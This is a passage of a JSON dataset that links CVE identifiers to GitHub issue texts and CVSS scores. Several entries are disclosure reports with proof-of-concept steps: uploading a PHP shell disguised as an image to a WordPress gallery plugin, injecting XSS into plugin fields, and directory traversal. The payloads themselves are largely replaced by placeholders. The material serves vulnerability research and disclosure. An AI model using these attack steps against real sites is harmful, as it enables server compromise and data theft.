  904. "Issue_Created_At": "2015-12-11T05:59:01Z",
  905. "description": "Add advisory for SMTP injection vulnerability in mail NUMBERTAG Need an advisory for the mail vulnerability discussed in FILETAG Affects NUMBERTAG",
  906. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  907. "severity": "MEDIUM",
  908. "baseScore": 6.1,
  909. "impactScore": 2.7,
  910. "exploitabilityScore": 2.8
  911. },
  912. {
  913. "CVE_ID": "CVE-2015-9228",
  914. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/6",
  915. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/6",
  916. "Repo_new": "cybersecurityworks/disclosed",
  917. "Issue_Created_At": "2015-09-14T11:33:13Z",
  918. "description": "Malicious File Upload in APITAG Gallery by Photocrati Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name Malicious File upload Software: APITAG Gallery Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: Malicious File upload vulnerability in APITAG plugin APITAG Gallery Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed in the following URL URLTAG which is vulnerable to file upload in file and name variable from which name variable extension is modified from JPG to PHP and file variable containing image content/information is semi modified with PHP shell to be executed in the server which can be accessed with the help of publicly available URL. here, it is URLTAG APITAG NUMBERTAG APITAG The Post Request file and name variable in the URL URLTAG is vulnerable to file upload. In which name variable extension is modified from JPG to PHP and file variable is added with PHP shell to be executed in the server which can be accessed with the help of publicly available URL URLTAG FILETAG APITAG NUMBERTAG APITAG Normal request to the server FILETAG APITAG NUMBERTAG APITAG File variable modified from JPG to PHP FILETAG APITAG NUMBERTAG APITAG Mixing the content of the uploading file with shell content to get executed FILETAG APITAG NUMBERTAG APITAG Showing that file has been uploaded as image into the server FILETAG APITAG NUMBERTAG APITAG Originally, file have been stored in PHP format which can be executed from outside login FILETAG APITAG NUMBERTAG APITAG Shell Executed giving system information of the hosted server. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Move on to Next Gen Gallery plugin file upload option available on products NUMBERTAG Upload JPG file to the server through file upload option NUMBERTAG Modify the file variable contains JPG extension to PHP. Also, edit and add shell content to the name variable body containing JPG information/content. APITAG APITAG NUMBERTAG Discovered in APITAG Gallery NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG endor responded in the same NUMBERTAG Fixed in APITAG Gallery NUMBERTAG ersion. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  919. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  920. "severity": "HIGH",
  921. "baseScore": 8.8,
  922. "impactScore": 5.9,
  923. "exploitabilityScore": 2.8
  924. },
  925. {
  926. "CVE_ID": "CVE-2015-9229",
  927. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/5",
  928. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/5",
  929. "Repo_new": "cybersecurityworks/disclosed",
  930. "Issue_Created_At": "2015-09-14T11:10:04Z",
  931. "description": "XSS in APITAG Gallery by Photocrati Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name XSS APITAG Site Scripting) Software: APITAG Gallery Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: XSS vulnerability in APITAG plugin APITAG Gallery Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. URLTAG and modify the value of APITAG images FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to images FILETAG APITAG NUMBERTAG APITAG XSS Payload executed in the browser whenever the user views it. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the variable images NUMBERTAG alttext] in APITAG Gallery Photocrati Version NUMBERTAG recently updated version) in the URL URLTAG NUMBERTAG Fill all the variables with APITAG payload and save it to view further NUMBERTAG Now, the added XSS payload will be executed whenever the user reviews it. APITAG APITAG NUMBERTAG Discovered in APITAG Gallery NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG endor responded saying, APITAG you, we'll inform NGG about this NUMBERTAG Same vulnerability again discovered in APITAG Gallery NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG Same vulnerability found & still exist in APITAG Gallery NUMBERTAG ersion. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  932. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  933. "severity": "MEDIUM",
  934. "baseScore": 4.8,
  935. "impactScore": 2.7,
  936. "exploitabilityScore": 1.7
  937. },
  938. {
  939. "CVE_ID": "CVE-2015-9230",
  940. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/3",
  941. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/3",
  942. "Repo_new": "cybersecurityworks/disclosed",
  943. "Issue_Created_At": "2015-09-14T10:25:09Z",
  944. "description": "XSS Vulnerability in APITAG Security Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name XSS APITAG Site Scripting) Software: APITAG Security Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: XSS vulnerability in APITAG plugin APITAG Security Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. FILETAG and modify the value of APITAG variable with \"> APITAG APITAG APITAG payload and send the request to the server. Now, the added XSS payload will be echoed back from the server without validating the input. It also affects FILETAG file, $table_prefix and corrupts the database connectivity. APITAG APITAG XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to FILETAG file. APITAG APITAG APITAG define( 'DISALLOW_UNFILTERED_HTML', true ); APITAG APITAG APITAG APITAG NUMBERTAG APITAG The Post Request APITAG variable in the URL FILETAG is vulnerable to Cross Site Scripting (XSS) APITAG NUMBERTAG APITAG Invalid HTTP script Request sent to the server through the vulnerable APITAG APITAG variable in the URL FILETAG APITAG NUMBERTAG APITAG Echoed back HTTP Response without validation. APITAG NUMBERTAG APITAG Response Executed in the browser with Cookie value APITAG NUMBERTAG APITAG $table_prefix is also damaged with the given XSS Payload APITAG NUMBERTAG APITAG Error message after the payload gets executed in the browser APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the value of APITAG variable in APITAG Security NUMBERTAG Fill all the variables with APITAG APITAG payload and send the request to the server NUMBERTAG Now, the added XSS payload will be echoed back from the server without validating the input even after FILETAG file has been configured with XSS filter settings NUMBERTAG It also affects FILETAG file $table_prefix and corrupts the database connectivity APITAG APITAG NUMBERTAG Discovered in APITAG Security Plugin NUMBERTAG Fixed in APITAG Security Plugin Version NUMBERTAG APITAG by: APITAG Sathish from Cyber Security Works Pvt Ltd",
  945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  946. "severity": "MEDIUM",
  947. "baseScore": 4.8,
  948. "impactScore": 2.7,
  949. "exploitabilityScore": 1.7
  950. },
  951. {
  952. "CVE_ID": "CVE-2015-9236",
  953. "Issue_Url_old": "https://github.com/hapijs/hapi/issues/2850",
  954. "Issue_Url_new": "https://github.com/hapijs/hapi/issues/2850",
  955. "Repo_new": "hapijs/hapi",
  956. "Issue_Created_At": "2015-10-16T19:22:15Z",
  957. "description": "NUMBERTAG Release Notes. Summary hapi NUMBERTAG is primarily a rewrite of the CORS implementation. The previous code was both confusing, an incorrect implementation of the protocol, and allowed for configurations that at best returned inconsistent headers and at worst allowed cross origin activities that were expected to be forbidden. The change removes half the CORS options available and moves the implementation to be truly per route without any connection wide catch all. Upgrade time : low no time to a couple of hours for most users Complexity : low a bit of search and replace and removal of unsupported configs Risk : low low risk of side effects and few changes to keep track of overall Dependencies : medium removed the APITAG method Sponsor APITAG APITAG APITAG The NUMBERTAG major release is sponsored by FILETAG . Breaking Changes Removed the CORS configuration options: methods , APITAG , APITAG , APITAG , and override . Added the APITAG HTTP status code to the default list of cached responses. The qs module no longer parses dot notation names into sub objects by default. Removed APITAG . Removed id from the APITAG event data (was already available as a generic event property). New Features Allow response validation of non object responses (string, number, etc). New option to override empty APITAG HTTP status responses with APITAG . Bug fixes Fixes multiple issues with CORS, including a few security related. Updated dependencies qs from NUMBERTAG to NUMBERTAG Migration Checklist CORS You don't have to change anything if: not setting the cors route option using it with the defaults by setting the value to true not using the cors options: methods , APITAG , APITAG , APITAG , and override The main changes are: CORS preflight headers are no set only on reflight requests and no on resource requests. This means that the methods and APITAG options are no longer needed because the preflight response will return the requested method as specified by the protocol. This will ensure other methods which may not allow cross origin access to be separately configured. The override flag is no longer needed as the only header which you may manually set at the handler level is Access Control Expose Headers which will be appended by default. Setting any other CORS header manually will result in a conflict with the preflight response. The Access Control Allow Origin header is now always set to the incoming Origin header value. If the incoming value does not match the allowed origins, no CORS headers are set. Checklist: Make sure that if you are using the internal CORS feature, you are not setting ANY CORS headers yourself other than Access Control Expose Headers. If you need to set any other header manually, do not use the CORS feature! You will end up with a broken and potentially insecure implementation. Remove the options no longer supported. There is no need to replace them. Misc If you rely on the previous qs query parsing behavior of breaking dot notation into segments, you must set the APITAG option to true . This is available in route config APITAG and connection config APITAG . Replace APITAG with APITAG . If you listen to the request APITAG event, use the APITAG value instead of the removed APITAG value.",
  958. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  959. "severity": "MEDIUM",
  960. "baseScore": 5.3,
  961. "impactScore": 1.4,
  962. "exploitabilityScore": 3.9
  963. },
  964. {
  965. "CVE_ID": "CVE-2015-9236",
  966. "Issue_Url_old": "https://github.com/hapijs/hapi/issues/2840",
  967. "Issue_Url_new": "https://github.com/hapijs/hapi/issues/2840",
  968. "Repo_new": "hapijs/hapi",
  969. "Issue_Created_At": "2015-10-14T08:38:36Z",
  970. "description": "CORS route specific override can conflict with connection defaults. If the connection has CORS enabled but one route has it off, and the route is not GET, the OPTIONS prefetch request will return the default CORS headers and then the actual request will go through and return no CORS headers. This defeats the purpose of turning CORS on the route.",
  971. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  972. "severity": "MEDIUM",
  973. "baseScore": 5.3,
  974. "impactScore": 1.4,
  975. "exploitabilityScore": 3.9
  976. },
  977. {
  978. "CVE_ID": "CVE-2015-9243",
  979. "Issue_Url_old": "https://github.com/hapijs/hapi/issues/2980",
  980. "Issue_Url_new": "https://github.com/hapijs/hapi/issues/2980",
  981. "Repo_new": "hapijs/hapi",
  982. "Issue_Created_At": "2015-12-17T06:16:58Z",
  983. "description": "CORS regression in hapi NUMBERTAG It seems that the server option's route defaults are no longer used when route specific config options are present NUMBERTAG worked as expected, and APITAG does not. ERRORTAG ERRORTAG But adding a 'cors' configuration object to the route, causes the 'access control allow credentials' header to be dropped ERRORTAG ERRORTAG Is this intentional? I much prefer being able to have default values in place and explicitly override specific keys, rather than have to respecify all values for a route where only one of them needs customized.",
  984. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  985. "severity": "MEDIUM",
  986. "baseScore": 5.9,
  987. "impactScore": 3.6,
  988. "exploitabilityScore": 2.2
  989. },
  990. {
  991. "CVE_ID": "CVE-2015-9252",
  992. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/51",
  993. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/51",
  994. "Repo_new": "qpdf/qpdf",
  995. "Issue_Created_At": "2015-09-02T13:08:54Z",
  996. "description": "crash / stack overflow with malformed input pdf. Passing this pdf to qpdf will cause a crash: FILETAG Looking at the stack trace this seems to be an endless recursion causing a stack overflow. Here's (part of) the stack trace when compiling qpdf with address sanitizer (latest git code NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffdede NUMBERTAG pc NUMBERTAG f5ddac0dce7 bp NUMBERTAG ffdede NUMBERTAG e NUMBERTAG sp NUMBERTAG ffdede NUMBERTAG T NUMBERTAG f5ddac0dce6 in pcre_compile2 APITAG NUMBERTAG b in PCRE::PCRE(char const , int) PATHTAG NUMBERTAG ece NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG be in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&) PATHTAG NUMBERTAG c NUMBERTAG b in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF , bool, bool, bool) PATHTAG NUMBERTAG c4c NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF , bool, bool, bool) PATHTAG NUMBERTAG bcf0c in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF ) PATHTAG NUMBERTAG b4d0 in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, bool) PATHTAG NUMBERTAG b NUMBERTAG in APITAG long long, APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, int&, int&) PATHTAG NUMBERTAG da2 in QPDF::resolve(int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG , int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG PATHTAG NUMBERTAG a NUMBERTAG ca in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, bool) PATHTAG NUMBERTAG b NUMBERTAG in APITAG long long, APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, int&, int&) PATHTAG NUMBERTAG da2 in QPDF::resolve(int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG , int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG PATHTAG NUMBERTAG a NUMBERTAG ca in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, bool) PATHTAG",
  997. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  998. "severity": "MEDIUM",
  999. "baseScore": 5.5,
  1000. "impactScore": 3.6,
  1001. "exploitabilityScore": 1.8
  1002. },
  1003. {
  1004. "CVE_ID": "CVE-2015-9260",
  1005. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/8",
  1006. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/8",
  1007. "Repo_new": "cybersecurityworks/disclosed",
  1008. "Issue_Created_At": "2015-10-14T12:17:01Z",
  1009. "description": "Bedita CMS NUMBERTAG Publication Module Bug Report. Details ================ Bedita CMS NUMBERTAG Publication Module Bug Report Bug Name: XSS APITAG Site Scripting) Version NUMBERTAG Last Updated: PATHTAG Homepage: FILETAG Severity High Description: XSS vulnerability in Bedita CMS NUMBERTAG Publication module Proof of concept: (POC) ================== Issue: POST request URL URLTAG of Bedita CMS NUMBERTAG is vulnerable to Cross Site Scripting (XSS) FILETAG Figure NUMBERTAG SS Payload injected in the given URL URLTAG is reflected back in the response FILETAG Figure NUMBERTAG SS Payload gets executed in the browser APITAG by: APITAG Arjun Basnet from APITAG Cyber Security Works Pvt Ltd APITAG",
  1010. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  1011. "severity": "MEDIUM",
  1012. "baseScore": 5.4,
  1013. "impactScore": 2.7,
  1014. "exploitabilityScore": 2.3
  1015. },
  1016. {
  1017. "CVE_ID": "CVE-2015-9260",
  1018. "Issue_Url_old": "https://github.com/bedita/bedita/issues/755",
  1019. "Issue_Url_new": "https://github.com/bedita/bedita/issues/755",
  1020. "Repo_new": "bedita/bedita",
  1021. "Issue_Created_At": "2015-10-14T12:19:59Z",
  1022. "description": "Bedita CMS NUMBERTAG Publication Module Bug Report. Hi Team: please find the detail report link below URLTAG",
  1023. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  1024. "severity": "MEDIUM",
  1025. "baseScore": 5.4,
  1026. "impactScore": 2.7,
  1027. "exploitabilityScore": 2.3
  1028. },
  1029. {
  1030. "CVE_ID": "CVE-2015-9282",
  1031. "Issue_Url_old": "https://github.com/grafana/grafana/issues/4117",
  1032. "Issue_Url_new": "https://github.com/grafana/grafana/issues/4117",
  1033. "Repo_new": "grafana/grafana",
  1034. "Issue_Created_At": "2016-02-22T18:46:37Z",
  1035. "description": "XSS: Option to disable and / or sanitize html in text panels. Text panels can contain any html and therefore pose an XSS security problem. Grafana should come with a backend option to disable and or sanitize html in text panels.",
  1036. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1037. "severity": "MEDIUM",
  1038. "baseScore": 6.1,
  1039. "impactScore": 2.7,
  1040. "exploitabilityScore": 2.8
  1041. },
  1042. {
  1043. "CVE_ID": "CVE-2015-9282",
  1044. "Issue_Url_old": "https://github.com/grafana/piechart-panel/issues/3",
  1045. "Issue_Url_new": "https://github.com/grafana/piechart-panel/issues/3",
  1046. "Repo_new": "grafana/piechart-panel",
  1047. "Issue_Created_At": "2015-12-20T17:06:23Z",
  1048. "description": "XSS in piechart legend. Applies to every type of legend On Graph, Table and Right side. FILETAG",
  1049. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1050. "severity": "MEDIUM",
  1051. "baseScore": 6.1,
  1052. "impactScore": 2.7,
  1053. "exploitabilityScore": 2.8
  1054. },
  1055. {
  1056. "CVE_ID": "CVE-2015-9284",
  1057. "Issue_Url_old": "https://github.com/omniauth/omniauth/issues/1031",
  1058. "Issue_Url_new": "https://github.com/omniauth/omniauth/issues/1031",
  1059. "Repo_new": "omniauth/omniauth",
  1060. "Issue_Created_At": "2021-02-01T10:28:11Z",
  1061. "description": "APITAG CVE NUMBERTAG needs to be adapted for APITAG NUMBERTAG Configuration Provider Gem: APITAG Ruby Version: APITAG Framework: APITAG Platform: APITAG Expected Behavior Back when using APITAG NUMBERTAG I had written CVETAG non regression tests as instructed URLTAG . One test asserts that APITAG is raised when making a POST request without CSRF token. I expected this test to continue passing after upgrading, or finding instructions in the release notes on how it should be adapted after upgrading to APITAG NUMBERTAG Actual Behavior After upgrading to APITAG NUMBERTAG this test fails as no exception is caught. However the log shows that the exception was indeed raised: APITAG ERRORTAG APITAG To my understanding, the cause is that APITAG now catches the exception and sends it URLTAG to its APITAG . How should the test be adapted? Steps to Reproduce Install omniauth NUMBERTAG omniauth rails_csrf_protection NUMBERTAG copy and run the test linked URLTAG from the Wiki ( direct link URLTAG .",
  1062. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  1063. "severity": "HIGH",
  1064. "baseScore": 8.8,
  1065. "impactScore": 5.9,
  1066. "exploitabilityScore": 2.8
  1067. },
  1068. {
  1069. "CVE_ID": "CVE-2015-9285",
  1070. "Issue_Url_old": "https://github.com/esotalk/esoTalk/issues/444",
  1071. "Issue_Url_new": "https://github.com/esotalk/esotalk/issues/444",
  1072. "Repo_new": "esotalk/esotalk",
  1073. "Issue_Created_At": "2015-12-30T06:59:49Z",
  1074. "description": "Cross site scripting vulnerability. Hello, a cross site scripting vulnerability has been announced on the full disclosure mailing list ( URLTAG ). According to the Curesec advisory timeline they were unable to contact you: APITAG The issue can be reproduced with the following URL: ERRORTAG Do you have plans to fix this security vulnerability? If you do not plan to fix vulnerabilities in APITAG please mention it in the README or similar, thank you. As far as I can tell this issue does not yet have a CVE identifier assigned. Have you requested one?",
  1075. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1076. "severity": "MEDIUM",
  1077. "baseScore": 6.1,
  1078. "impactScore": 2.7,
  1079. "exploitabilityScore": 2.8
  1080. },
  1081. {
  1082. "CVE_ID": "CVE-2015-9410",
  1083. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/7",
  1084. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/7",
  1085. "Repo_new": "cybersecurityworks/disclosed",
  1086. "Issue_Created_At": "2015-09-14T11:48:53Z",
  1087. "description": "XSS Vulnerability in Blubrry APITAG Podcasting plugin Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name Malicious File upload Software: Blubrry APITAG Podcasting plugin Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: Malicious File upload vulnerability in APITAG plugin APITAG Gallery Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. FILETAG and modify the value of tab variable with APITAG payload and send the request to the server. Now, the added XSS payload will be echoed back from the server without validating the input. It also affects FILETAG file, $table_prefix and corrupts the database connectivity. APITAG APITAG XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to FILETAG file. APITAG APITAG APITAG define( 'DISALLOW_UNFILTERED_HTML', true ); APITAG APITAG APITAG APITAG NUMBERTAG APITAG The Post Request APITAG tab APITAG variable in the URL FILETAG is vulnerable to Cross Site Scripting (XSS) FILETAG APITAG NUMBERTAG APITAG Invalid HTTP script Request sent to the server through the vulnerable APITAG tab APITAG variable in the URL FILETAG and its echoed back in the HTTP Response without validation. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the value of tab variable in Blubrry APITAG Version NUMBERTAG Fill all the variables with APITAG payload and send the request to the server NUMBERTAG Now, the added XSS payload will be echoed back from the server without validating the input even after FILETAG file has been configured with XSS filter settings. 
APITAG APITAG NUMBERTAG Discovered in Blubrry APITAG Podcasting plugin NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG endor Responded, APITAG you for reporting this plugin. We're looking into it right now NUMBERTAG Fixed in Blubrry APITAG Podcasting plugin NUMBERTAG ersion. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  1088. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  1089. "severity": "MEDIUM",
  1090. "baseScore": 5.4,
  1091. "impactScore": 2.7,
  1092. "exploitabilityScore": 2.3
  1093. },
  1094. {
  1095. "CVE_ID": "CVE-2015-9478",
  1096. "Issue_Url_old": "https://github.com/scaron/prettyphoto/issues/149",
  1097. "Issue_Url_new": "https://github.com/scaron/prettyphoto/issues/149",
  1098. "Repo_new": "scaron/prettyphoto",
  1099. "Issue_Created_At": "2015-05-05T10:28:15Z",
  1100. "description": "any eta on xss fix. Someone reported an XSS vector in NUMBERTAG FILETAG",
  1101. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1102. "severity": "MEDIUM",
  1103. "baseScore": 6.1,
  1104. "impactScore": 2.7,
  1105. "exploitabilityScore": 2.8
  1106. },
  1107. {
  1108. "CVE_ID": "CVE-2015-9538",
  1109. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/2",
  1110. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/2",
  1111. "Repo_new": "cybersecurityworks/disclosed",
  1112. "Issue_Created_At": "2015-08-28T11:58:55Z",
  1113. "description": "Local File Inclusion (LFI). Word Press Product Bugs Report Bug Name LFI APITAG File Inclusion) Area Path APITAG Gallery by Photocrati Version NUMBERTAG APITAG Last Updated NUMBERTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Reported by sathish Cyber Security Works APITAG The folder selection accepts a Local File Inclusion (LFI) / directory traversal payload: when the user modifies the file path (the dir variable) with the payload and sends it to the server, the server acts on it without restricting it to the intended directory. POC: FILETAG Figure NUMBERTAG HTTP Request & Response for the vulnerable dir variable with PATHTAG APITAG traversal) payload Note: Similarly, the user can fetch details from any other website hosted on the same server (the PoC demonstrates directory listing outside the intended folder; reading arbitrary file contents is not shown). Reproducing Steps NUMBERTAG Log in to the application NUMBERTAG Access APITAG Gallery by Photocrati Plugin NUMBERTAG Click on the path selection on the given folders NUMBERTAG Modify dir variable value with PATHTAG APITAG traversal) payload in the intercepting proxy NUMBERTAG Now you can see the internal available system folders",
  1114. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  1115. "severity": "MEDIUM",
  1116. "baseScore": 6.5,
  1117. "impactScore": 3.6,
  1118. "exploitabilityScore": 2.8
  1119. },
  1120. {
  1121. "CVE_ID": "CVE-2015-9539",
  1122. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/4",
  1123. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/4",
  1124. "Repo_new": "cybersecurityworks/disclosed",
  1125. "Issue_Created_At": "2015-09-14T10:50:07Z",
  1126. "description": "XSS Vulnerability in Fast Secure Contact form version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name XSS APITAG Site Scripting) Software: Fast Secure Contact Form plugin Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: XSS vulnerability in APITAG plugin Fast Secure Contact Form Changelog: URLTAG Proof of concept ================ Visit the following page on a site with this plugin installed. URLTAG and modify the value of APITAG fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload executed in the browser whenever the user views it. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the variable fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload executed in the browser whenever the user views it. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the variable fs_contact_form1[welcome] in Fast Secure Contact Form NUMBERTAG recently updated version) in the URL URLTAG NUMBERTAG Fill all the variables with APITAG payload and save it to view further NUMBERTAG Now, the added XSS payload will be executed whenever the user reviews it. APITAG APITAG NUMBERTAG Discovered in Fast Secure Contact Form plugin NUMBERTAG ersion NUMBERTAG Reported to WP Plugin NUMBERTAG WP Plugin responded, APITAG you for reporting this plugin. We're looking into it right now NUMBERTAG Fixed in NUMBERTAG ersion of Fast Secure Contact Form plugin APITAG by: APITAG Sathish from Cyber Security Works Pvt Ltd",
  1127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1128. "severity": "MEDIUM",
  1129. "baseScore": 6.1,
  1130. "impactScore": 2.7,
  1131. "exploitabilityScore": 2.8
  1132. },
  1133. {
  1134. "CVE_ID": "CVE-2015-9544",
  1135. "Issue_Url_old": "https://github.com/ofirdagan/cross-domain-local-storage/issues/17",
  1136. "Issue_Url_new": "https://github.com/ofirdagan/cross-domain-local-storage/issues/17",
  1137. "Repo_new": "ofirdagan/cross-domain-local-storage",
  1138. "Issue_Created_At": "2015-08-13T00:40:18Z",
  1139. "description": "Restricting domain by origins. There doesn't appear to be a programmatic way to define a whitelist of origins that the iframe will accept requests from, so any page able to embed the iframe can send it requests. Verifying the origin is something that's recommended by the APITAG API documentation ( URLTAG ). It suggests that the receiver of a message should \"always verify the sender's identity\".",
  1140. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
  1141. "severity": "HIGH",
  1142. "baseScore": 7.1,
  1143. "impactScore": 5.2,
  1144. "exploitabilityScore": 1.8
  1145. },
  1146. {
  1147. "CVE_ID": "CVE-2015-9549",
  1148. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/11",
  1149. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/11",
  1150. "Repo_new": "cybersecurityworks/disclosed",
  1151. "Issue_Created_At": "2015-11-13T06:56:27Z",
  1152. "description": "APITAG CMS NUMBERTAG POC. As per the documentation of the Ocportal, a value in a template that is not meant to contain HTML is marked as an escaped value ({VALUE }). This means that \u2018html entities\u2019 are put in replacement of HTML control characters. FILETAG FILETAG Here the VALUE that is marked with the escape symbol will be filtered with the XSS filter and it will be sanitized before displaying it to the user. But they forgot to mark FIELD_NAME in OCF_EMOTICON_CELL.tpl file. PATHTAG FILETAG The View_all link besides the emoticons in the following screen is having this FIELD_NAME variable FILETAG The View_all link is sending the following GET request to the server FILETAG The following is the source code of FILETAG file PATHTAG FILETAG The following is the code related to emoticons_script function in FILETAG file PATHTAG FILETAG Code that is loading the template file with the user entered input PATHTAG FILETAG This code is reading the GET request parameter field_name and displaying it back to the user without filtering because the variable is not marked with the escape symbol, so it does not go through any filtering. GET request to FILETAG with script vector as value of field_name FILETAG And the inserted payload is reflected back to the user as shown in the following screen. FILETAG",
  1153. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1154. "severity": "MEDIUM",
  1155. "baseScore": 6.1,
  1156. "impactScore": 2.7,
  1157. "exploitabilityScore": 2.8
  1158. },
  1159. {
  1160. "CVE_ID": "CVE-2016-1000027",
  1161. "Issue_Url_old": "https://github.com/spring-projects/spring-framework/issues/24434",
  1162. "Issue_Url_new": "https://github.com/spring-projects/spring-framework/issues/24434",
  1163. "Repo_new": "spring-projects/spring-framework",
  1164. "Issue_Created_At": "2020-01-27T06:46:04Z",
